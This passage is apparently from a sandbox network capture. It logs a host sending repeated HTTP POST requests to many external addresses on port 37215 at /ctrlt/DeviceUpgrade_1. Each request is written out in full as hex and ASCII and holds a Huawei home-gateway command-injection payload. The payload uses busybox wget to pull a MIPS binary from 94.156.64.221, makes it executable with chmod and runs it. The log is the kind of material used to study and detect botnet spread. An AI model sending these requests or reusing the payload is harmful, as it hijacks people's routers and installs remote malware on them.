                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    229192.168.2.235440241.152.169.1837215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.253050089 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    230192.168.2.235514441.61.6.23137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.253082991 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    231192.168.2.235197641.137.161.2937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.253117085 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    232192.168.2.2341296197.189.238.22037215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.253169060 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    233192.168.2.2358966156.212.207.1237215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.253278017 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    234192.168.2.2356290197.25.244.8537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.253312111 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    235192.168.2.235242041.169.149.7337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.253357887 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    236192.168.2.2358048197.126.155.10737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.253379107 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    237192.168.2.233964241.89.44.24837215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.253438950 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    238192.168.2.2345918197.35.183.5237215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.253465891 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
